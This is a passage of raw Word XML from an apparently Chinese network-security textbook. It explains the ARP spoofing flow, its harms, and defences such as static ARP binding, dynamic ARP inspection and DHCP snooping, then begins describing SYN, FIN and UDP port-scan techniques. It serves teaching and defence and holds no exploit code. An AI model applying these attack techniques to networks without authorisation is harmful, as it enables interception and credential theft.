        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>网关</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC30F1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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>网关</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>响应</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE52A2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>攻击过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4FCD3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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>响应</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>宣称自己是网关</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E83FAAC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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>响应</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>网关</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>宣称自己是主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28349864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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>结果：主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>与网关的通信全部经过攻击者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C6EA35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危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E13975E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据窃取：获取账号密码等敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A2E01E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持：劫持已登录的网站会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CB91C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间人攻击：篡改传输内容（如插入恶意代码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D65BB0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务：阻断目标网络访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448833CC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防御措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3837F02D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505CABC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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F66B6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>arp -s 192.168.1.1 00-11-22-33-44-55  # Windows/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D543AD8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33624B6F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>&lt;CISCO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF4A86E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 xml:space="preserve">ip arp inspection vlan 10  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EE6C43" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DHCP Snooping</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC1A2F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>&lt;CISCO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4560BA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">ip dhcp snooping  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>建立合法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP-MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>映射表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CAFBC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络分段：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缩小广播域范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EBC47" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>端口扫描攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59C8BC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攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01769F14" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过发送特定探测包判断端口状态：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC18062" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描：发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包，收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN/ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示开放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066F956" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP FIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描：发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包，无响应表示开放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29780CFE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描：发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包，收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可达表示关闭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D974150" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析响应差异建立端口映射表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1A07C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>识别运行服务及其版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6689CA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="482"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Hlk200651371"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>常见扫描类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC0F4EE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
